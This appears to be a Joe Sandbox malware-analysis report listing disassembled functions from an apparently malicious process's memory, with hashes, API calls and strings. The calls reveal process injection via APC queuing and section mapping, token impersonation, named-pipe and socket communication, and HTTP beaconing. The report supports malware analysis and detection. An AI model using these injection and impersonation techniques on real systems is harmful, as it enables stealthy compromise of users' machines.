Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: _mallocaccepthtonl$CountTick_memsetclosesocketioctlsocketselect
String ID: d
API String ID: 4083423528-2564639436
Opcode ID: 5b2faf772bb2dc274055356b473c197d2f5a59933f21c6312a58995ef2a0ed49
Instruction ID: 003d3ec74fc4559853ba26f6949ce3898de2ef79fdcce1185b6bc0673e5eb8ca
Opcode Fuzzy Hash: 5b2faf772bb2dc274055356b473c197d2f5a59933f21c6312a58995ef2a0ed49
Instruction Fuzzy Hash: 90715F71C00609AFDBA5EFA6CC48AAEB7F9AF44354F10456AFA15E2550E730DE44CB50

Uniqueness

Uniqueness Score: -1.00%

Function 06762730 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 147networksleepCOMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0676275B
_memset.LIBCMT ref: 06762770
__snprintf.LIBCMT ref: 067627AE
__snprintf.LIBCMT ref: 067627CA
__snprintf.LIBCMT ref: 0676282A
__snprintf.LIBCMT ref: 06762841

Part of subcall function 06775A26: __output_l.LIBCMT ref: 06775AA8

HttpOpenRequestA.WININET(00000000,?,00000000,00000000,0678E540,06796C58), ref: 0676287E
HttpSendRequestA.WININET(00000000,?,?,?,?), ref: 067628A7
InternetCloseHandle.WININET(00000000), ref: 067628B9
Sleep.KERNEL32(000001F4), ref: 067628C0
InternetCloseHandle.WININET(00000000), ref: 067628D1

Strings

%s%s, xrefs: 0676283A
*/*, xrefs: 0676274B

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: __snprintf$CloseHandleHttpInternetRequest_memset$OpenSendSleep__output_l
String ID: %s%s$*/*
API String ID: 894754388-856325523
Opcode ID: 109898eae8e0b9085ec115cfc2baa7bf6d3a2376d33f1142175f9fdc62606e00
Instruction ID: 02ebcf3d50754226753ca058ff37890d8f14ad847b18ed43adcfe6f4a158ebd6
Opcode Fuzzy Hash: 109898eae8e0b9085ec115cfc2baa7bf6d3a2376d33f1142175f9fdc62606e00
Instruction Fuzzy Hash: E141D372800219AEDF91ABA5DC88DFE7B7AEF05304F044065FA14B3011EB359A49CB71

Uniqueness

Uniqueness Score: -1.00%

Function 06765597 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 114threadsleepprocessCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll,NtQueueApcThread,00000000,00000000), ref: 067655DC
GetProcAddress.KERNEL32(00000000), ref: 067655E3

Part of subcall function 0676550C: _malloc.LIBCMT ref: 0676552B
Part of subcall function 0676550C: VirtualAllocEx.KERNEL32(?,00000000,00000000,00003000,00000040,?,00000000,00000000,00000000,00000000,?), ref: 0676555E
Part of subcall function 0676550C: WriteProcessMemory.KERNEL32(?,00000000,?,00000000,00000000,?,00000000,00000000,00000000,00000000,?), ref: 06765576

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 06765612
Thread32First.KERNEL32(00000000,0000001C), ref: 06765627
OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 0676564C
CloseHandle.KERNEL32(00000000), ref: 06765669
Thread32Next.KERNEL32(00000000,0000001C), ref: 06765672
CloseHandle.KERNEL32(00000000), ref: 0676567E
Sleep.KERNEL32(000000C8), ref: 06765685
ReadProcessMemory.KERNEL32(00000000,00000000,06765200,00000010,067654C2), ref: 06765698
WriteProcessMemory.KERNEL32(00000000,00000000,06765200,00000010,00000010), ref: 067656C2

Strings

NtQueueApcThread, xrefs: 067655C0
ntdll, xrefs: 067655C7

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: HandleMemoryProcess$CloseThread32Write$AddressAllocCreateFirstModuleNextOpenProcReadSleepSnapshotThreadToolhelp32Virtual_malloc
String ID: NtQueueApcThread$ntdll
API String ID: 4105558983-1374908105
Opcode ID: 999122f2b6b3310a7a3eaedc8c4ef52ef3df6e1ffabfdbb276c83cd39da6c97a
Instruction ID: c1992f93a4786f95a68b6ff9ede48a93eae3d40ffff3ff813560a6230108d944
Opcode Fuzzy Hash: 999122f2b6b3310a7a3eaedc8c4ef52ef3df6e1ffabfdbb276c83cd39da6c97a
Instruction Fuzzy Hash: CC415E71D4121CBFEF50DFA5CC49AAEBBB9EB08B00F108425FA15E6160E7709A44DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 06761B65 Relevance: 21.4, APIs: 14, Instructions: 422fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 06766FE0: htonl.WS2_32(890679DF), ref: 06766FF6

CreateFileMappingA.KERNEL32(000000FF,00000000,00000040,00000000,00000180,00000000), ref: 06761D33
MapViewOfFile.KERNEL32(00000000,000F003F,00000000,00000000,00000000,?,?,00000080,?,?,?,06764AEE,067941A8,00000000,00000001,0678E534), ref: 06761D48
CloseHandle.KERNEL32(00000000,?,?,00000080,?,?,?,06764AEE,067941A8,00000000,00000001,0678E534,00000080), ref: 06761D54
GetLastError.KERNEL32(?,?,00000080,?,?,?,06764AEE,067941A8,00000000,00000001,0678E534,00000080), ref: 06761DAF
_memset.LIBCMT ref: 06761DFD
_memset.LIBCMT ref: 06761E3D
_memset.LIBCMT ref: 06761E87
_memset.LIBCMT ref: 06761ED1
_memset.LIBCMT ref: 06761F1B
_memset.LIBCMT ref: 06761F6B
_memset.LIBCMT ref: 06761F93

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: _memset$File$CloseCreateErrorHandleLastMappingViewhtonl
String ID:
API String ID: 423609709-0
Opcode ID: f359f7ebeefd458ca22a066f72dc681c7c40d0aa5a54ff90b5f4788562cc629f
Instruction ID: 8a3387d27c4616b149198870f1d32ecf213cce00d5e14b61ef32d9da91f46650
Opcode Fuzzy Hash: f359f7ebeefd458ca22a066f72dc681c7c40d0aa5a54ff90b5f4788562cc629f
Instruction Fuzzy Hash: 95D1B2B2A006019FDBA0DF6ACC8496B77F6FF88204758893DFA57D6A10E331F9558B50

Uniqueness

Uniqueness Score: -1.00%

Function 0676B8A0 Relevance: 21.1, APIs: 14, Instructions: 118COMMONLIBRARYCODE

Download Yara Rule

APIs

htonl.WS2_32(?), ref: 0676B8C5
htonl.WS2_32(00000000), ref: 0676B8D5
OpenProcess.KERNEL32(00000400,00000000,00000000,?), ref: 0676B8E4
GetLastError.KERNEL32 ref: 0676B8F0
OpenProcessToken.ADVAPI32(00000000,00000000,00000008), ref: 0676B912
GetLastError.KERNEL32 ref: 0676B91C
ImpersonateLoggedOnUser.ADVAPI32(00000008), ref: 0676B939
GetLastError.KERNEL32 ref: 0676B93F
DuplicateTokenEx.ADVAPI32(00000008,02000000,00000000,00000003,00000001,0679AEA4), ref: 0676B95E
GetLastError.KERNEL32 ref: 0676B968
ImpersonateLoggedOnUser.ADVAPI32 ref: 0676B97A
GetLastError.KERNEL32 ref: 0676B980
CloseHandle.KERNEL32(00000000), ref: 0676B996
CloseHandle.KERNEL32(00000000), ref: 0676B9A1

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: ErrorLast$CloseHandleImpersonateLoggedOpenProcessTokenUserhtonl$Duplicate
String ID:
API String ID: 2311469260-0
Opcode ID: ecf894b02f33f18145673636750ce0b7f35a2ab289d38fea2c3fb2302984915c
Instruction ID: ea7186d05898fa58e5010d62a0311ec3cc139a877df91405f941cedf4adab4fd
Opcode Fuzzy Hash: ecf894b02f33f18145673636750ce0b7f35a2ab289d38fea2c3fb2302984915c
Instruction Fuzzy Hash: F131F67198030AFFEB915B62DC49F7A37ADEF11B59F248024FE11E6050DA708D508BA2

Uniqueness

Uniqueness Score: -1.00%

Function 0676673A Relevance: 19.6, APIs: 13, Instructions: 94pipesleepfileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 06766749
GetTickCount.KERNEL32 ref: 06766753
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00100000,00000000,?,?,?,00000000,?,00000001,?,?,00000000), ref: 0676676D
GetLastError.KERNEL32(?,?,?,00000000,?,00000001,?,?,00000000,?,?,00000000), ref: 0676677A
WaitNamedPipeA.KERNEL32(?,00002710), ref: 0676678F
Sleep.KERNEL32(000003E8,?,?,?,00000000,?,00000001,?,?,00000000,?,?,00000000), ref: 0676679C
GetTickCount.KERNEL32 ref: 067667A2
GetLastError.KERNEL32(?,?,?,00000000,?,00000001,?,?,00000000,?,?,00000000), ref: 067667B8
GetLastError.KERNEL32(?,?,?,00000000,?,00000001,?,?,00000000,?,?,00000000), ref: 067667C8
SetNamedPipeHandleState.KERNEL32(?,?,00000000,00000000,?,?,?,00000000,?,00000001,?,?,00000000,?,?,00000000), ref: 067667E6
GetLastError.KERNEL32(?,?,?,00000000,?,00000001,?,?,00000000,?,?,00000000), ref: 067667F0
DisconnectNamedPipe.KERNEL32(?), ref: 0676682A
CloseHandle.KERNEL32(?), ref: 06766831

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: ErrorLast$CountNamedPipeTick$Handle$CloseCreateDisconnectFileSleepStateWait
String ID:
API String ID: 832653698-0
Opcode ID: 40ae3bc73a1abebfbb8136eacc1631a0d25bff1a28a4f747ee8580ce741ddab5
Instruction ID: 34f24bd671efdfa7fd01e834838222fee827e2102784eb3f825bf97de9d93906
Opcode Fuzzy Hash: 40ae3bc73a1abebfbb8136eacc1631a0d25bff1a28a4f747ee8580ce741ddab5
Instruction Fuzzy Hash: 9421C771A54219BFEB8067B6DC89B7D3AADEB04720FA08425FF21E60D0EE609D404667

Uniqueness

Uniqueness Score: -1.00%

Function 067675BD Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 69networkCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 067675CE
select.WS2_32(00000000,00000000,?,?,00000000), ref: 06767619
__WSAFDIsSet.WS2_32(00000000,?), ref: 06767629
__WSAFDIsSet.WS2_32(00000000,?), ref: 0676763C
GetTickCount.KERNEL32 ref: 06767645
gethostbyname.WS2_32(0676776C), ref: 06767650
htons.WS2_32(?), ref: 06767663
inet_addr.WS2_32(0676776C), ref: 0676766F
sendto.WS2_32(00000000,00000000,0000000A,00000000,?,00000010), ref: 06767689

Strings

d, xrefs: 067675DC

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: CountTick$gethostbynamehtonsinet_addrselectsendto
String ID: d
API String ID: 1257931466-2564639436
Opcode ID: 0aeba085f3667b8b0f0ee17dd3d3817f82360075085977318dc706ce398a5c8a
Instruction ID: d7eaa3c4a9f48fa4ea53ee4f769515290b50788f5511e7372edeb6088fe260d7
Opcode Fuzzy Hash: 0aeba085f3667b8b0f0ee17dd3d3817f82360075085977318dc706ce398a5c8a
Instruction Fuzzy Hash: E3218E72940209AFDF959FA4DC45BEE7BB9EF08304F1041A6FA00E6155EB70CE918F90

Uniqueness

Uniqueness Score: -1.00%

Function 06763BC9 Relevance: 16.6, APIs: 11, Instructions: 127threadinjectionCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 06768F9C: GetCurrentProcess.KERNEL32(?,06763BE7,55FF50D4,06767FC2,00000000), ref: 06768FA8

GetThreadContext.KERNEL32(?,?,06767FC2,00000000), ref: 06763C0F
GetLastError.KERNEL32 ref: 06763C19
ReadProcessMemory.KERNEL32(55FF50D4,?,?,00000004,00000000), ref: 06763C45
ReadProcessMemory.KERNEL32(55FF50D4,?,?,00000008,00000000), ref: 06763C5B
VirtualProtectEx.KERNEL32(55FF50D4,006A0875,?,00000004,?), ref: 06763C71
_malloc.LIBCMT ref: 06763C80
_memset.LIBCMT ref: 06763C8F
_memset.LIBCMT ref: 06763CC0
WriteProcessMemory.KERNEL32(55FF50D4,006A0875,00000000,?,067640F1), ref: 06763CE2
GetLastError.KERNEL32 ref: 06763CEC
_memset.LIBCMT ref: 06763D01

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: Process$Memory_memset$ErrorLastRead$ContextCurrentProtectThreadVirtualWrite_malloc
String ID:
API String ID: 3502685472-0
Opcode ID: 5ea7633a59eb4c089cff34c00de0b3ab523842a37979f2854c945b701b33717f
Instruction ID: 1af360a71018e71d37a712d4fb4ec43f083c5bf37177b72017e4731d3771d67d
Opcode Fuzzy Hash: 5ea7633a59eb4c089cff34c00de0b3ab523842a37979f2854c945b701b33717f
Instruction Fuzzy Hash: DD41AEB2900118BEEB90ABA6DC49EBF77BCEF04654F105065FB55E1080EB318D41DB76

Uniqueness

Uniqueness Score: -1.00%

Function 067633BF Relevance: 16.6, APIs: 11, Instructions: 103sleepfilepipeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 067633D5
GetLastError.KERNEL32(?,?,?,?,?,00000001,?,?,?,?,?,?,?,?,06768B89), ref: 06763435
GetTickCount.KERNEL32 ref: 06763440
Sleep.KERNEL32(000003E8,?,?,?,?,?,00000001,?,?,?,?,?,?,?,?,06768B89), ref: 0676344B
GetLastError.KERNEL32(?,?,?,?,?,00000001,?,?,?,?,?,?,?,?,06768B89), ref: 06763457
WriteFile.KERNEL32(?,?,00000004,00000000,00000000,?,?,?,?,?,00000001), ref: 06763489
WriteFile.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,?,?,00000001), ref: 067634B4
FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,?,?,?,?,?,06768B89), ref: 067634C8
DisconnectNamedPipe.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,?,?,?,?,?,06768B89), ref: 067634D1
CloseHandle.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,?,?,?,?,?,06768B89), ref: 067634DA
Sleep.KERNEL32(000003E8,?,?,?,?,?,00000001,?,?,?,?,?,?,?,?,06768B89), ref: 067634E5

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: File$CountErrorLastSleepTickWrite$BuffersCloseDisconnectFlushHandleNamedPipe
String ID:
API String ID: 1326360348-0
Opcode ID: 1b29662c6708036bfa4b98298a8577bb4d51f21385b3d326b666846c13ba0f00
Instruction ID: 32c27e149752d9004d1ba1e1456e32ae70e276a73145f528b63295ffa5a1ed4d
Opcode Fuzzy Hash: 1b29662c6708036bfa4b98298a8577bb4d51f21385b3d326b666846c13ba0f00
Instruction Fuzzy Hash: 5E315D72D4010CBFDB41EBE5DC89AEEBB79EB04350F244065FA15E2190DB726E44CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 067681A0 Relevance: 16.6, APIs: 11, Instructions: 101threadCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 067681B1
GetLastError.KERNEL32 ref: 067681C0
UpdateProcThreadAttribute.KERNEL32(?,00000000,00020000,?,00000004,00000000,00000000), ref: 067681EE
GetLastError.KERNEL32 ref: 067681F8
CloseHandle.KERNEL32(00000000), ref: 06768209
GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000,00000001,00000003), ref: 06768231
DuplicateHandle.KERNEL32(00000000), ref: 06768238
GetCurrentProcess.KERNEL32(00000000,?,?,00000000,00000001,00000003), ref: 06768263
DuplicateHandle.KERNEL32(00000000), ref: 06768266
GetCurrentProcess.KERNEL32(?,?,?,00000000,00000001,00000003), ref: 0676827F
DuplicateHandle.KERNEL32(00000000), ref: 06768282

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: HandleProcess$CurrentDuplicate$ErrorLast$AttributeCloseOpenProcThreadUpdate
String ID:
API String ID: 2151055714-0
Opcode ID: d3c96af4a85c4218ca44d1a42160544253ea864c9a8ef988054ba0381438eb86
Instruction ID: 08b16b8781197bb2a3dc4bfb8d9224f55e9fa8b765d7dce29c19e3e0ee04d4d0
Opcode Fuzzy Hash: d3c96af4a85c4218ca44d1a42160544253ea864c9a8ef988054ba0381438eb86
Instruction Fuzzy Hash: B3315071A90218BFDBA1DB61DC89F6B3B6EEB45754F244009FB11DA180DA719D01CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 0676580C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 85filelibraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,NtMapViewOfSection,00000000,?,?,?,067654C2,00000000,00000000), ref: 06765839
GetProcAddress.KERNEL32(00000000), ref: 06765840
CreateFileMappingA.KERNEL32(000000FF,00000000,00000040,00000000,00000000,00000000), ref: 0676585C
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,?,067654C2,00000000,00000000), ref: 06765872
UnmapViewOfFile.KERNEL32(00000000,?,?,?,?,067654C2,00000000,00000000), ref: 067658AF
CloseHandle.KERNEL32(00000000,?,?,067654C2,00000000,00000000), ref: 067658B6
GetLastError.KERNEL32(?,?,067654C2,00000000,00000000), ref: 067658C1

Strings

ntdll.dll, xrefs: 06765834
NtMapViewOfSection, xrefs: 0676582F

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: File$HandleView$AddressCloseCreateErrorLastMappingModuleProcUnmap
String ID: NtMapViewOfSection$ntdll.dll
API String ID: 2680503992-3170647572
Opcode ID: 9066f408077ec26447c764a71bbb8ba92f6f3c085b5608ece830c16e397eb964
Instruction ID: 2a62402280359d226cd025f89579c568b2b66b16a6cc607a0d8c59c7dad47a3e
Opcode Fuzzy Hash: 9066f408077ec26447c764a71bbb8ba92f6f3c085b5608ece830c16e397eb964
Instruction Fuzzy Hash: 1B21B076941228BFE760ABA29C4CCAF3F6DEF49760F204515FB25D6091DA708900D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 067674F7 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 59networksleepCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 06767508
select.WS2_32(00000000,00000000,?,?,00000000), ref: 06767556
__WSAFDIsSet.WS2_32(00000000,?), ref: 06767566
__WSAFDIsSet.WS2_32(00000000,?), ref: 06767579
send.WS2_32(00000000,00000000,?,00000000), ref: 0676758D
WSAGetLastError.WS2_32(00000000,?,00000000,?,?,00000000), ref: 06767597
Sleep.KERNEL32(000003E8,?,00000000), ref: 067675A9
GetTickCount.KERNEL32 ref: 067675AF

Strings

d, xrefs: 06767516

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: CountTick$ErrorLastSleepselectsend
String ID: d
API String ID: 2152284305-2564639436
Opcode ID: 68479d21061202572e9ec45fc4148f6ff3969923fe50ae4fd35ed1b5d74398cc
Instruction ID: c2dfaf326d4b81c21c3e776b1f775b85afbfa8cc0195dc30864bc7326ce78498
Opcode Fuzzy Hash: 68479d21061202572e9ec45fc4148f6ff3969923fe50ae4fd35ed1b5d74398cc
Instruction Fuzzy Hash: 8E11B271C8021DAFDB55EFA0DC84BE977B9AB04314F1042A6FA15E2191DBB09EC18FD0

Uniqueness

Uniqueness Score: -1.00%

Function 06379D3C Relevance: 13.6, APIs: 9, Instructions: 105COMMON

Download Yara Rule

APIs

__crt_waiting_on_module_handle.LIBCMT ref: 06379D3E
__init_pointers.LIBCMT ref: 06379DF6
__encode_pointer.LIBCMT ref: 06379E01
__encode_pointer.LIBCMT ref: 06379E11
__encode_pointer.LIBCMT ref: 06379E21
__encode_pointer.LIBCMT ref: 06379E31
__decode_pointer.LIBCMT ref: 06379E52
__calloc_crt.LIBCMT ref: 06379E6B
__decode_pointer.LIBCMT ref: 06379E85

Memory Dump Source

Source File: 00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp, Offset: 06360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6360000_2.jbxd

Yara matches

Similarity

API ID: __encode_pointer$__decode_pointer$__calloc_crt__crt_waiting_on_module_handle__init_pointers
String ID:
API String ID: 1960427394-0
Opcode ID: 8f364794ccb6f05bd5b5cdfb8bf60533199f60f4f2f78c521bf241e129551c82
Instruction ID: 7114eceefd8c5eaf68e713c7c05b27b585ccfbf862ee368cb9491dab7105a2a5
Opcode Fuzzy Hash: 8f364794ccb6f05bd5b5cdfb8bf60533199f60f4f2f78c521bf241e129551c82
Instruction Fuzzy Hash: 44314F758016309EFBB2AF348CC67153BE4EB097A0711861AF8249B6F1EB3A9545DF90

Uniqueness

Uniqueness Score: -1.00%

Function 067673EC Relevance: 13.6, APIs: 9, Instructions: 101networkCOMMON

Download Yara Rule

APIs

htonl.WS2_32 ref: 0676740B
htons.WS2_32(00000000), ref: 0676741C
socket.WS2_32(00000002,00000001,00000000), ref: 06767455
closesocket.WS2_32(00000000), ref: 06767464
gethostbyname.WS2_32(00000000), ref: 06767482
htons.WS2_32(?), ref: 067674AE
ioctlsocket.WS2_32(00000000,8004667E,?), ref: 067674C1
connect.WS2_32(00000000,?,00000010), ref: 067674D2
WSAGetLastError.WS2_32(00000000,?,00000010), ref: 067674DB

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: htons$ErrorLastclosesocketconnectgethostbynamehtonlioctlsocketsocket
String ID:
API String ID: 3339321253-0
Opcode ID: 41509ae13815dc5b81685a908753e7d734b1786bb61dbdc81a338f87b3b0afc5
Instruction ID: 9d6c0a2ec828a1509a14e16d89938c40f21d3e795b865a9cb9fa0cd376b9ab2f
Opcode Fuzzy Hash: 41509ae13815dc5b81685a908753e7d734b1786bb61dbdc81a338f87b3b0afc5
Instruction Fuzzy Hash: 1631D672D40118AEDBA0EBB59C88EBE7BFCEF44254F104165FA54E7140E6B48E01C765

Uniqueness

Uniqueness Score: -1.00%

Function 06765B34 Relevance: 13.6, APIs: 9, Instructions: 98memorythreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 06765B4B
GetVersionExA.KERNEL32(?), ref: 06765B64
SetLastError.KERNEL32(00000005), ref: 06765B86
VirtualAlloc.KERNEL32(00000000,0000004C,00003000,00000040,00000000,00000000,00000000), ref: 06765BA3
VirtualAlloc.KERNEL32(00000000,00000149,00003000,00000040), ref: 06765BB8
SetLastError.KERNEL32(00000006), ref: 06765C08
ResumeThread.KERNEL32(?), ref: 06765C13
VirtualFree.KERNEL32(067654C2,00000000,00004000), ref: 06765C2A
VirtualFree.KERNEL32(00000000,00000000,00004000), ref: 06765C30

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
